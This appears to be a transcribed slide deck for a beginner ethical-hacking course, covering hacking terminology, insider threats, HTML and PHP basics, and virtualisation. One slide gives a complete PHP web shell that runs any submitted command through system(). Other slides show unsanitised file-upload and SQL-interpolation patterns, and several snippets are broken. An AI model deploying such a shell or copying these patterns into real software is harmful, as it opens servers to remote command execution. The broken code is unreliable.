Cyber Security and

Ethical Hacking
by Mahesh Rakheja
 Question?
What is TCSI?

What i am going to learn?

What should be expectations?

What is Cyber Security?

What will be my future after IBCSI?

Who is the trainer?

 Mahesh
Rakheja
Technical Public Speaker
 About Me
I am technical public speaker.

I am a malcoder, I develop malwares and viruses.

I represented myself in the international

conference of hackers (The Hackers Conference).

I represented myself in the international

conference of malwares (Malcon).

I worked with various confidential departments

of India.
I trained Indian army.

I trained Maharashtra police.

I trained 10,000+ Engineering students.

I delivered lecture in 150+ Engineering colleges.

Includes IIT, NIT, BITS, DTU and many more

reputed colleges.

I traveled almost all states of India, To spread

awareness about cyber security.

Interviewed by AajTak, ZeeNews, Times of India,

The Hindu and many more reputed brands.
Hack to Earn
Proud Facebook Status
News in The Hindu
India has just 556
5 Lakh jobs by 2015
Hacking
 Hacking Terms
Hacking

Hacker

Black Hat Hacker

White Hat Hacker

Grey Hat Hacker

Black Box Testing

White Box Testing

Grey Box Testing

 Hacking Terms
Vulnerability

Exploit/Proof of Concept

0 Day (“Oh-Day”- “Zero Day”)

Vulnerability Scan

Penetration Test

No Damage

Scope

Computers/Systems/Networks

Expand

Time 3days to 1month.

Written Agreements
 Insider Threats
Pure Insider

Authorised Physical Access

Network Logon

Elevated Pure Insider

Employees + Some Contractors

Greedy or disgruntled.
 Insider Threats
Insider Associate

Limited Authorised Physical Access

No direct network logon

Often Overlooked

Potentially spies

Exposed Papers, Logon Systems, “Secure” Areas that

still need services.

Maintenance , Guards.
 Insider Threats
Insider Affiliate

has connection with employee(Client, Spouse,

BF, GF,BFF etc)

Visitor Access

Loaned badge/Pin

Borrowed Company’s Laptop

Might actually be social engineer.

 Types of Hackers
Black Hat/Cracker/Malicious

White Hat/Ethical Hacker/Pentester

Grey Hat Hacker

Hactivisim

Suicide Hacker

Script Kiddy

Phreak

Red Team (Collection of all qualities)

 Basic Needs
Languages

HTML (Hypertext Markup Language)

PHP (Hypertext Preprocessor)

Programming skills in any one language(C,C++,Java,etc)

Database (MySql, Oracle, etc)

Operating System

Linux(Redhat,Ubuntu,Backtrack)

Windows (Windows 98,XP,windows 7, windows server)

Basic Software Requirements

Dream Viewer

WAMP or LAMP

Virtual Box or VM Ware

Kali linux or Backtrack Operating System

 Basic HTML Tags
<html>Some code</html>

Starting tag of any html document.

<head>Some Code</head>

Contains some basic tags of html document.

<title> Some code </title>

Specifies the title of the website.

<body>Some Code</body>

Contains the body of HTML Document.

 Formatting Tags
<h1>(Some code)</h1>

Writes the text in header format.

<b>(Some Code)</b>

Formatting the text in bold.

<font>(Some Code)</font>

Formatting font and colour of html document.

<Script>(Some Code)</script>

To include script in HTML code.

 Input Tag
<input type=“text” name=“field_name”/>

To specify text field

<input type=“password” name=“pass_name”/>

To specify password field

<input type=“submit” name=“button_name”/>

To specify button

<textarea name=“textareaname”></textarea>

To specify textarea
 Form Tag
Syntax

<form action=“reference_url” method=“POST/GET”>

(Some Code)

</form

action=“reference_url”

To specify the target path, to which we pass the value.

method=“POSTGET”

To specify the method by which you will send the value. (Either get
or post)
What do you need for PHP?
(Windows or Linux) Operating System

Apache Server

MySql Database (Optional)

In short you require LAMP or WAMP

Some basic knowledge of JavaScript or C

Programming language.
 PHP Basics
Syntax

<?php

?>

Hello World Program in PHP

<?php echo”Hello World”; ?>

Variable declaration in PHP

$variablename = varvalue

varvlue can be any type of value.(Integer,String,Double,Float,etc.)

PHP Program to display variable value

<?php

$a = 4; //global variable

$b = 20;

$c = $a + $b;

echo $c;

?>
Conditional Statements
Syntax (if condition)

if(condition) code to be excited, If condition is true.

Example

<?php

$d = date(“D”);

if($d==“Fri”) echo “Have a nice weekend”;

?>
 If else condition
Syntax

if(condition)

Code to be excuted, If condition is ture;

else

Code to be executed, If condition is false;

}
 If Example
<?php

$d=date(“D”);

if($d==“Fri”)

echo “Have a nice weekend”;

else

echo “Have a nice day”;

}
PHP Switch Statement
Syntax
●switch (n)

{

case label1:

  code to be executed if n=label1;

  break;

case label2:

  code to be executed if n=label2;

  break;

default:

  code to be executed if n is different from both
label1 and label2;

}
 Example
●<?php

$x=1;

switch ($x)

{

case 1:

  echo "Number 1";

  break;

case 2:

  echo "Number 2";

  break;

case 3:

  echo "Number 3";

  break;

default:

  echo "No number between 1 and 3";

}

?>
 While Loop
Syntax
●while (condition)

  {

  code to be executed;

 }
Example
●<?php

$i=1;

while($i<=5)

  {

  echo "The number is " . $i . "<br />";

  $i++;

  }

?>
PHP-File Open: Read

●$myFile = “testFile.txt”;
●$fh = fopen($myFile,’r’);
●$theData = fread($fh,5);
●Fclose($fh);
●echo $theData;
 PHP - File Upload:
●<form encrypt = “multipart/form-data”
action=“uploader.php” method=“POST”>
●<input type=“hidden”
name=“MAX_FILE_SIZE” value=“100000”/>
●Choose a file to upload: <input
name=“uploadedfile” type=“file” /><br />
●<input type=“submit” value=“Upload File”/>
●</form>
 Uploader.php
●<?php
●$target_path = “uploads/”;
●$target_path =
$target_path.basename($_FILES[‘uploa
dedfile’][‘name’]);
●$_FILES[‘uploadedfile’][‘tmp_name’];
●?>
Connection to MySql Database

●Example
●<?php
●$host=“localhost”;
●$username=“root”;
●$dbpassword=“passwd”;
●$db_name=“mahesh”;
●$con=mysql_connect(“$host”,”$username”,”$db
password”) or die(“cannot connect”);
●mysql_select_db(“$db_name”) or die(“cannot
select DB”);
 SQL Queries
●To insert new data:
●Insert into
table(datetime,title,body)VALUES(‘$datetime’,’$title’,
’$body’);
●To select data from database:
●Select * from table where condition
●To update database values:
●Update table set password = ‘mattu’ where
username=‘admin’
●To delete the data:
●Delete from table where id=‘99’
Mail Function in PHP
●Syntax
●mail(to,subject,message,headers,parameters)
●Example
●<?php

$to = "[email protected]";

$subject = "My subject";

$txt = "Hello world!";

$headers = "From: [email protected]" .
"\r\n" .

"CC: [email protected]“;

mail($to,$subject,$txt,$headers);

?>
 PHP Code for Shell
●<?php
●$command = $_POST["command"];
●echo '<pre>';
●$last_line = system($command, $retval);
●?>
●<html>
●<head>
●<title>Shell eample</title>
●</head>
●<body>
●<form action="system.php" method="post">
●<input type="text" name="command" id="command"/>
●<input type="submit" name="button" value="Execute"/>
●</form>
●</body>
●</html>
Virtualisation
Introduction to Virtualisation
Virtualisation is a core of IT Skill

Primary

Parallels, VMware fusion.

VMware workstation/player.

Virtual Box

Hyper-V
 Why Virtualisation?
Consistent + Repeatable

Virtual HW is reliable.

copy , move and clone

Snapshots

Physical to Virtual for non destructive test.

Network Isolation

Portability
 Using Virtualisation
Download + Install

Configuring HW

Power States

Host Vs Guest

Logging In

Virtualisation Tools

Snapshots
 The End
Lets see some practicals.